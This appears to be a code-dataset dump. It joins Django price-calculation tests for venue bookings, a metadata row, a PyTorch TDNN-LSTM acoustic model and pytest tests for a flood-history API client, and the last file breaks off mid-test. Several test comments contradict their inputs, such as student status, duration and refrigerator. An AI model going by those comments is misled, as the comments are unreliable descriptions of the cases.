start_time=dt.time(18, 0),
duration=6,
student='yes',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (80.0,))
# Testing the case: # underWeek # Student # under50 # 3h # norefigerator # toilets should be needed becuase of statrting time # expected outcome 60
def test_price6(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(22, 0),
duration=3,
student='yes',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (60.0,))
# Testing the case: # underWeek # Student # over50 # 3h # norefigerator # toilets not needed # expected outcome 40
def test_price7(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=3,
student='yes',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (40.0,))
# Testing the case: # underWeek # Student # over50 # 3h # norefigerator # toilets should be needed becasuse of starting time # expected outcome 80
def test_price8(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(22, 0),
duration=3,
student='yes',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (80.0,))
# Testing the case: # underWeek # Student # over50 # 6h # norefigerator #no toilets # expected outcome 70
def test_price9(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=6,
student='yes',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (70.0,))
# Testing the case: # underWeek # Student # over50 # 6h # norefigerator # toilets should be needed becasuse of starting time # expected outcome 110
def test_price10(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(17, 0),
duration=6,
student='yes',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (110.0,))
# Testing the case: # underWeek # Student # over50 # 9h # norefigerator # toilets should be needed because always needed # expected outcome 170
def test_price11(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(17, 0),
duration=12,
student='yes',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (170.0,))
# Testing the case: # underWeek # noStudent # under50 # 6h # norefigerator # notoiletsneeded # expected outcome 40
def test_price12(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=3,
student='no',
number_people=5,
refrigerator='yes',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (40.0,))
# Testing the case: # underWeek # noStudent # under50 # 6h # norefigerator # notoiletsneeded # expected outcome 70
def test_price13(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=6,
student='no',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (70.0,))
# Testing the case: # underWeek # noStudent # under50 # 9h # norefigerator # toilets should always be needed # expected outcome 165
def test_price14(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=12,
student='no',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (165.0,))
# Testing the case: # underWeek # noStudent # under50 # 6h # norefigerator # toilets needed because of starting time # expected outcome 110
def test_price15(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(18, 0),
duration=6,
student='no',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (110.0,))
# Testing the case: # underWeek # Student # under50 # 3h # norefigerator # toilets should be needed becuase of statrting time # expected outcome 80
def test_price16(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(22, 0),
duration=3,
student='no',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (80.0,))
# Testing the case: # underWeek # Student # over50 # 3h # norefigerator # toilets not needed # expected outcome 65
def test_price17(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=3,
student='no',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (65.0,))
# Testing the case: # underWeek # Student # over50 # 3h # norefigerator # toilets should be needed becasuse of starting time # expected outcome 105
def test_price18(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(22, 0),
duration=3,
student='no',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (105.0,))
# Testing the case: # underWeek # Student # over50 # 6h # norefigerator #no toilets # expected outcome 110
def test_price19(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(16, 0),
duration=6,
student='no',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (110.0,))
# Testing the case: # underWeek # Student # over50 # 6h # norefigerator # toilets should be needed becasuse of starting time # expected outcome 150
def test_price20(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(17, 0),
duration=6,
student='no',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (150.0,))
# Testing the case: # underWeek # Student # over50 # 9h # norefigerator # toilets should be needed because always needed # expected outcome 190
def test_price21(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 1),
start_time=dt.time(17, 0),
duration=12,
student='no',
number_people=55,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (190.0,))
# Testing the case: #Weekend #Student #12h # expected outcome 165
def test_price22(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 12),
start_time=dt.time(10, 0),
duration=12,
student='yes',
number_people= 5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (165.0,))
# Testing the case: #Weekend #Student #24h # expected outcome 280
def test_price23(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 12),
start_time=dt.time(10, 0),
duration=24,
student='yes',
number_people=125,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (280.0,))
# Testing the case: #Weekend #noStudent 12h # expected outcome 265
def test_price24(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 12),
start_time=dt.time(10, 0),
duration=12,
student='no',
number_people=5,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (265.0,))
# Testing the case: #Weekend #noStudent 24h # expected outcome 380
def test_price25(self):
user = User.objects.create(id=1, is_staff=True)
booking = Booking.objects.create(date=dt.date(2020, 1, 12),
start_time=dt.time(10, 0),
duration=24,
student='no',
number_people=50,
refrigerator='no',
occasion='',
confirmed=False,
rent_paid=False,
contract_signed=False,
deposit_paid=False,
deposit_refunded=False,
author=user)
t = booking.calculate_price_event(),
self.assertEqual(t, (380.0,))
| 53.783203 | 154 | 0.375604 | 2,023 | 27,537 | 4.989125 | 0.068216 | 0.064401 | 0.034678 | 0.047062 | 0.942534 | 0.935401 | 0.916378 | 0.915486 | 0.906371 | 0.895274 | 0 | 0.04784 | 0.553655 | 27,537 | 511 | 155 | 53.888454 | 0.77333 | 0.10081 | 0 | 0.900232 | 0 | 0 | 0.00468 | 0 | 0 | 0 | 0 | 0 | 0.058005 | 1 | 0.058005 | false | 0 | 0.011601 | 0 | 0.071926 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ce2e0bd610b2d33d985a180817e76d81aca376cd | 6,591 | py | Python | snowfall/models/tdnn_lstm.py | yaguanghu/snowfall | 8bb8d8cd667e89b5963b4e3c14c15c5370d751ce | [
"Apache-2.0"
] | null | null | null | snowfall/models/tdnn_lstm.py | yaguanghu/snowfall | 8bb8d8cd667e89b5963b4e3c14c15c5370d751ce | [
"Apache-2.0"
] | null | null | null | snowfall/models/tdnn_lstm.py | yaguanghu/snowfall | 8bb8d8cd667e89b5963b4e3c14c15c5370d751ce | [
"Apache-2.0"
] | null | null | null | from torch import Tensor
from torch import nn
from snowfall.models import AcousticModel
class TdnnLstm1a(AcousticModel):
"""
Args:
num_features (int): Number of input features
num_classes (int): Number of output classes
"""
def __init__(self, num_features: int, num_classes: int, subsampling_factor: int = 3) -> None:
super().__init__()
self.num_features = num_features
self.num_classes = num_classes
self.subsampling_factor = subsampling_factor
self.tdnn = nn.Sequential(
nn.Conv1d(in_channels=num_features,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=self.subsampling_factor, # <---- stride=3: subsampling_factor!
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
)
self.lstm = nn.LSTM(500, 500)
self.dropout = nn.Dropout(0.5)
self.tdnn2 = nn.Sequential(
nn.Conv1d(in_channels=500,
out_channels=2000,
kernel_size=1,
stride=1,
padding=0), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=2000, affine=False),
nn.Conv1d(in_channels=2000,
out_channels=num_classes,
kernel_size=1,
stride=1,
padding=0)
)
def forward(self, x: Tensor) -> Tensor:
r"""
Args:
x (torch.Tensor): Tensor of dimension (batch_size, num_features, input_length).
Returns:
Tensor: Predictor tensor of dimension (batch_size, number_of_classes, input_length).
"""
x = self.tdnn(x)
x, _ = self.lstm(x.permute(2, 0, 1)) # (B, F, T) -> (T, B, F)
x = x.permute(1, 2, 0) # (T, B, F) -> (B, F, T)
x = self.dropout(x)
x = self.tdnn2(x)
x = nn.functional.log_softmax(x, dim=1)
return x
class TdnnLstm1b(AcousticModel):
"""
Args:
num_features (int): Number of input features
num_classes (int): Number of output classes
"""
def __init__(self, num_features: int, num_classes: int, subsampling_factor: int = 3) -> None:
super().__init__()
self.num_features = num_features
self.num_classes = num_classes
self.subsampling_factor = subsampling_factor
self.tdnn = nn.Sequential(
nn.Conv1d(in_channels=num_features,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=1,
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
nn.Conv1d(in_channels=500,
out_channels=500,
kernel_size=3,
stride=self.subsampling_factor, # <---- stride: subsampling_factor!
padding=1), nn.ReLU(inplace=True),
nn.BatchNorm1d(num_features=500, affine=False),
)
self.lstms = nn.ModuleList([
nn.LSTM(input_size=500, hidden_size=500, num_layers=1)
for _ in range(5)
])
self.lstm_bnorms = nn.ModuleList([
nn.BatchNorm1d(num_features=500, affine=False)
for _ in range(5)
])
self.dropout = nn.Dropout(0.2)
self.linear = nn.Linear(in_features=500, out_features=self.num_classes)
def forward(self, x: Tensor) -> Tensor:
"""
Args:
x (torch.Tensor): Tensor of dimension (batch_size, num_features, input_length).
Returns:
Tensor: Predictor tensor of dimension (batch_size, number_of_classes, input_length).
"""
x = self.tdnn(x)
x = x.permute(2, 0, 1) # (B, F, T) -> (T, B, F) -> how LSTM expects it
for lstm, bnorm in zip(self.lstms, self.lstm_bnorms):
x_new, _ = lstm(x)
x_new = bnorm(x_new.permute(1, 2, 0)).permute(2, 0, 1) # (T, B, F) -> (B, F, T) -> (T, B, F)
x_new = self.dropout(x_new)
x = x_new + x # skip connections
x = x.transpose(1, 0) # (T, B, F) -> (B, T, F) -> linear expects "features" in the last dim
x = self.linear(x)
x = x.transpose(1, 2) # (B, T, F) -> (B, F, T) -> shape expected by Snowfall
x = nn.functional.log_softmax(x, dim=1)
return x
| 39.945455 | 105 | 0.513276 | 757 | 6,591 | 4.295905 | 0.121532 | 0.084563 | 0.039975 | 0.071956 | 0.820726 | 0.79797 | 0.76599 | 0.726015 | 0.713407 | 0.713407 | 0 | 0.054581 | 0.377333 | 6,591 | 164 | 106 | 40.189024 | 0.737817 | 0.139584 | 0 | 0.719697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.022727 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ce39f810ad517c1d368d62fb85ac0f3c05e7fea0 | 33,133 | py | Python | tests/api/test_historic.py | opleban/fsf_api_access_python | ebe4af99e0f1dd59f7273fa62e6f05953aa8a510 | [
"MIT"
] | null | null | null | tests/api/test_historic.py | opleban/fsf_api_access_python | ebe4af99e0f1dd59f7273fa62e6f05953aa8a510 | [
"MIT"
] | null | null | null | tests/api/test_historic.py | opleban/fsf_api_access_python | ebe4af99e0f1dd59f7273fa62e6f05953aa8a510 | [
"MIT"
] | null | null | null | # Author: Kelvin Lai <kelvin@firststreet.org>
# Copyright: This module is owned by First Street Foundation
# Standard Imports
import os
# External Imports
import pytest
# Internal Imports
import firststreet
from firststreet.errors import InvalidArgument
api_key = os.environ['FSF_API_KEY']
fs = firststreet.FirstStreet(api_key)
class TestHistoricEvent:
def test_empty(self):
with pytest.raises(InvalidArgument):
fs.historic.get_event([], "")
def test_wrong_fsid_type(self):
with pytest.raises(InvalidArgument):
fs.historic.get_event("9")
def test_invalid(self):
event_id = [0000]
historic = fs.historic.get_event(event_id)
assert len(historic) == 1
assert historic[0].eventId == event_id[0]
assert historic[0].properties is None
assert historic[0].valid_id is False
def test_single(self):
event_id = [9]
historic = fs.historic.get_event(event_id)
assert len(historic) == 1
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
assert historic[0].valid_id is True
def test_multiple(self):
event_id = [9, 13]
historic = fs.historic.get_event(event_id)
assert len(historic) == 2
historic.sort(key=lambda x: x.eventId)
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
assert historic[1].eventId == event_id[1]
assert historic[1].properties is not None
assert historic[0].valid_id is True
assert historic[1].valid_id is True
def test_single_csv(self, tmpdir):
event_id = [9]
historic = fs.historic.get_event(event_id, csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
assert historic[0].valid_id is True
def test_multiple_csv(self, tmpdir):
event_id = [9, 13]
historic = fs.historic.get_event(event_id, csv=True, output_dir=tmpdir)
assert len(historic) == 2
historic.sort(key=lambda x: x.eventId)
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
assert historic[1].eventId == event_id[1]
assert historic[1].properties is not None
assert historic[0].valid_id is True
assert historic[1].valid_id is True
def test_mixed_invalid(self):
event_id = [9, 0]
historic = fs.historic.get_event(event_id)
assert len(historic) == 2
historic.sort(key=lambda x: x.eventId, reverse=True)
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
assert historic[1].eventId == event_id[1]
assert not historic[1].properties
assert historic[0].valid_id is True
assert historic[1].valid_id is False
def test_mixed_invalid_csv(self, tmpdir):
event_id = [9, 0]
historic = fs.historic.get_event(event_id, csv=True, output_dir=tmpdir)
assert len(historic) == 2
historic.sort(key=lambda x: x.eventId, reverse=True)
assert historic[0].eventId == event_id[0]
assert historic[0].properties is not None
assert historic[1].eventId == event_id[1]
assert not historic[1].properties
assert historic[0].valid_id is True
assert historic[1].valid_id is False
def test_one_of_each(self, tmpdir):
historic = fs.historic.get_event([2], csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].eventId == 2
assert historic[0].name is not None
assert historic[0].type is not None
assert historic[0].month is not None
assert historic[0].year is not None
assert historic[0].returnPeriod is not None
assert historic[0].properties is not None
assert historic[0].properties.get("total") is not None
assert historic[0].properties.get("affected") is not None
assert historic[0].geometry is not None
class TestHistoricSummary:
def test_empty(self):
with pytest.raises(InvalidArgument):
fs.historic.get_summary([], "")
def test_empty_fsid(self):
with pytest.raises(InvalidArgument):
fs.historic.get_summary([], "property")
def test_empty_type(self):
with pytest.raises(InvalidArgument):
fs.historic.get_summary([190836953], "")
def test_wrong_fsid_type(self):
with pytest.raises(InvalidArgument):
fs.historic.get_summary(190836953, "property")
def test_wrong_fsid_number(self):
fsid = [1867176]
historic = fs.historic.get_summary(fsid, "property")
assert len(historic) == 1
assert historic[0].fsid == fsid[0]
assert not historic[0].historic
assert historic[0].valid_id is False
def test_incorrect_lookup_type(self, tmpdir):
fsid = [190836953]
historic = fs.historic.get_summary(fsid, "city", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].fsid == fsid[0]
assert not historic[0].historic
assert historic[0].valid_id is False
def test_wrong_historic_type(self):
with pytest.raises(TypeError):
fs.historic.get_summary([190836953], 190)
def test_single(self):
fsid = [190836953]
historic = fs.historic.get_summary(fsid, "property")
assert len(historic) == 1
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[0].valid_id is True
def test_multiple(self):
fsid = [190836953, 193139123]
historic = fs.historic.get_summary(fsid, "property")
assert len(historic) == 2
historic.sort(key=lambda x: x.fsid)
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[1].fsid == fsid[1]
assert historic[1].historic is not None
assert historic[0].valid_id is True
assert historic[1].valid_id is True
def test_single_csv(self, tmpdir):
fsid = [190836953]
historic = fs.historic.get_summary(fsid, "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[0].valid_id is True
def test_multiple_csv(self, tmpdir):
fsid = [190836953, 193139123]
historic = fs.historic.get_summary(fsid, "property", csv=True, output_dir=tmpdir)
assert len(historic) == 2
historic.sort(key=lambda x: x.fsid)
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[1].fsid == fsid[1]
assert historic[1].historic is not None
assert historic[0].valid_id is True
assert historic[1].valid_id is True
def test_mixed_invalid(self):
fsid = [190836953, 000000000]
historic = fs.historic.get_summary(fsid, "property")
assert len(historic) == 2
historic.sort(key=lambda x: x.fsid, reverse=True)
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[1].fsid == fsid[1]
assert not historic[1].historic
assert historic[0].valid_id is True
assert historic[1].valid_id is False
def test_mixed_invalid_csv(self, tmpdir):
fsid = [190836953, 000000000]
historic = fs.historic.get_summary(fsid, "property", csv=True, output_dir=tmpdir)
assert len(historic) == 2
historic.sort(key=lambda x: x.fsid, reverse=True)
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[1].fsid == fsid[1]
assert not historic[1].historic
assert historic[0].valid_id is True
assert historic[1].valid_id is False
def test_coordinate_invalid(self, tmpdir):
historic = fs.historic.get_summary([(82.487671, -62.374322)], "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert not historic[0].historic
assert historic[0].valid_id is False
def test_single_coordinate(self, tmpdir):
historic = fs.historic.get_summary([(40.7079652311, -74.0021455387)], "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].historic is not None
assert historic[0].valid_id is True
def test_address_invalid_404(self, tmpdir):
historic = fs.historic.get_summary(["Shimik, Nunavut"], "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert not historic[0].historic
assert historic[0].valid_id is False
def test_address_invalid_500(self, tmpdir):
historic = fs.historic.get_summary(["Toronto, Ontario, Canada"], "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert not historic[0].historic
assert historic[0].valid_id is False
def test_single_address(self, tmpdir):
historic = fs.historic.get_summary(["247 Water St, New York, New York"], "property",
csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].historic is not None
assert historic[0].valid_id is True
def test_one_of_each(self, tmpdir):
historic = fs.historic.get_summary([511447411], "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 511447411
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("depth") is not None
historic = fs.historic.get_summary([540225], "neighborhood", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 540225
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([1982200], "city", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 1982200
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([50156], "zcta", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 50156
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([19153004900], "tract", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 19153004900
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([19163], "county", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 19163
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([1901], "cd", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 1901
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([39], "state", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 39
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
class TestHistoricSummaryDetail:
def test_empty(self):
with pytest.raises(InvalidArgument):
fs.historic.get_events_by_location([], "")
def test_empty_fsid(self):
with pytest.raises(InvalidArgument):
fs.historic.get_events_by_location([], "property")
def test_empty_type(self):
with pytest.raises(InvalidArgument):
fs.historic.get_events_by_location([190836953], "")
def test_wrong_fsid_type(self):
with pytest.raises(InvalidArgument):
fs.historic.get_events_by_location(190836953, "city")
def test_wrong_fsid_number(self):
fsid = [11]
historic = fs.historic.get_events_by_location([11], "city")
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].fsid == fsid[0]
assert not historic[0][0].historic
assert historic[0][0].valid_id is False
assert not historic[1][0].properties
assert historic[0][0].valid_id is False
def test_incorrect_lookup_type(self, tmpdir):
fsid = [1982200]
historic = fs.historic.get_events_by_location(fsid, "state", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].fsid == fsid[0]
assert not historic[0][0].historic
assert historic[0][0].valid_id is False
assert not historic[1][0].properties
assert historic[0][0].valid_id is False
def test_wrong_historic_type(self):
with pytest.raises(TypeError):
fs.historic.get_events_by_location([1982200], 190)
def test_single(self):
fsid = [1982200]
historic = fs.historic.get_events_by_location(fsid, "city")
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].fsid == fsid[0]
assert historic[0][0].historic is not None
assert historic[0][0].valid_id is True
assert historic[1][0].properties is not None
assert historic[0][0].valid_id is True
def test_multiple(self):
fsid = [1982200, 3905074]
historic = fs.historic.get_events_by_location(fsid, "city")
assert len(historic[0]) == 2
assert len(historic[1]) == 2
historic[0].sort(key=lambda x: x.fsid)
historic[1].sort(key=lambda x: x.eventId)
assert historic[0][0].fsid == fsid[0]
assert historic[0][0].historic is not None
assert historic[0][1].fsid == fsid[1]
assert historic[0][1].historic is not None
assert historic[1][0].properties is not None
assert historic[1][1].properties is not None
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][1].valid_id is True
assert historic[1][1].valid_id is True
def test_single_csv(self, tmpdir):
fsid = [1982200]
historic = fs.historic.get_events_by_location(fsid, "city", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
historic[0].sort(key=lambda x: x.fsid)
historic[1].sort(key=lambda x: x.eventId)
assert historic[0][0].fsid == fsid[0]
